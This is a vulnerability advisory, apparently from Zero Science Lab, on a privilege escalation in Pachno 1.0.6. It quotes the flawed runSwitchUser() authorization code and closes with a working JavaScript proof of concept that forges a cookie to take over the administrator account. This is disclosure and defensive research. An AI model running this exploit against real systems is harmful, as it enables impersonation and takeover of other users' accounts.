📄 Pachno 1.0.6 Privilege Escalation

Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation
    
    
    Vendor: Daniel André Eikeland
    Product web page: https://github.com/pachno/pachno
    Affected version: 1.0.6
    
    Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
    Genie) designed for team project management, issue tracking, and documentation. It
    offers a module-based, customizable environment for software development and team
    workflows, distributed under the Mozilla Public License.
    
    Desc: The authorization check in the runSwitchUser() action evaluates the expression
    !canSaveConfiguration() && !hasCookie('original_username') and only forbids the request
    when both subexpressions are true. The presence of the original_username cookie is
    sufficient to satisfy the second condition, and that cookie is fully client-controlled.
    An authenticated low-privilege user who sets original_username to any value and then
    issues a request to switch to user ID 1 receives a fresh session token (token authentication)
    or password hash cookie (password authentication) belonging to the target user. This
    can be exploited to elevate privileges to administrator and impersonate arbitrary user
    accounts.
    
    =====================================================================================
    /core/modules/auth/controllers/Authentication.php:
    --------------------------------------------------
            /**
             * Switch user action
             *
             * @Route(name="switch_to_user", url="/userswitch/switch/:user_id/:csrf_token")
             * @CsrfProtected
             *
             * @param framework\Request $request
             */
            public function runSwitchUser(framework\Request $request)
            {
                if (!$this->getUser()->canSaveConfiguration() && !$request->hasCookie('original_username'))
                    return $this->forward403();
    
                $response = $this->getResponse();
                $authentication_backend = framework\Settings::getAuthenticationBackend();
                if ($request['user_id']) {
                    $user = new entities\User($request['user_id']);
                    if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
                        $response->setCookie('original_username', $request->getCookie('username'));
                        $response->setCookie('original_session_token', $request->getCookie('session_token'));
                        framework\Context::getResponse()->setCookie('username', $user->getUsername());
                        framework\Context::getResponse()->setCookie('session_token', $user->createUserSession()->getToken());
                    } else {
                        $response->setCookie('original_username', $request->getCookie('username'));
                        $response->setCookie('original_password', $request->getCookie('password'));
                        framework\Context::getResponse()->setCookie('password', $user->getHashPassword());
                        framework\Context::getResponse()->setCookie('username', $user->getUsername());
                    }
                } else {
                    if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
                        $response->setCookie('username', $request->getCookie('original_username'));
                        $response->setCookie('session_token', $request->getCookie('original_session_token'));
                        framework\Context::getResponse()->deleteCookie('original_session_token');
                        framework\Context::getResponse()->deleteCookie('original_username');
                    } else {
                        $response->setCookie('username', $request->getCookie('original_username'));
                        $response->setCookie('password', $request->getCookie('original_password'));
                        framework\Context::getResponse()->deleteCookie('original_password');
                        framework\Context::getResponse()->deleteCookie('original_username');
                    }
                }
                $this->forward($this->getRouting()->generate('home'));
            }
    =====================================================================================
    
    Tested on: GNU/Linux
               Apache2
               PHP/7.4
               MySQL/5.7 (MariaDB)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5985
    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5985
    
    
    06.04.2026
    
    --
    
    
    document.cookie = "original_username=liquidworm; path=/";
    
    const csrf = document.querySelector('input[name="csrf_token"]')?.value
              || document.querySelector('meta[name="csrf-token"]')?.content;
    
    fetch('/switch_user', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded',
                   'User-Agent'  : 'AuthorizationBypassium/1.12.04' },
        body: `user_id=1&csrf_token=${encodeURIComponent(csrf)}`
    }).then(() => {
        window.location.href = '/configure';
    });
    // If you 'see' /configure, you are admin.